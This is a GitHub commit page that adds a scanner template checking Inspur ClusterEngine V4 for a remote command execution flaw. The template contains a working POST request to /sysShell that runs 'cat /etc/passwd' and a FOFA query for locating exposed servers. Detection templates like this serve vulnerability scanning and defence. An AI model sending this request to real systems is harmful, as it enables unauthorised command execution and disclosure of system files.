Merge pull request #4292 from ritikchaddha/patch-40

Create inspur-clusterengine-v4-sysshell-rce.yaml
patch-1
Prince Chaddha 2022-11-25 13:25:49 +05:30 committed by GitHub
commit 2b411ebf9d
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 34 additions and 0 deletions

View File

@ -0,0 +1,34 @@
id: inspur-clusterengine-rce
info:
name: Inspur Clusterengine V4 SYSshell RCE
author: ritikchaddha
severity: critical
reference:
- https://github.com/MzzdToT/ClusterEngineV4.0sysShell_rce
metadata:
fofa-query: title="TSCEV4.0"
tags: inspur,clusterengine,rce
requests:
- raw:
- |
POST /sysShell HTTP/1.1
Host: {{Hostname}}
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Cookie: lang=cn
op=doPlease&node=cu01&command=cat+/etc/passwd
redirects: true
max-redirects: 2
matchers-condition: and
matchers:
- type: regex
part: body
regex:
- "root:.*:0:0:"
- type: status
status:
- 200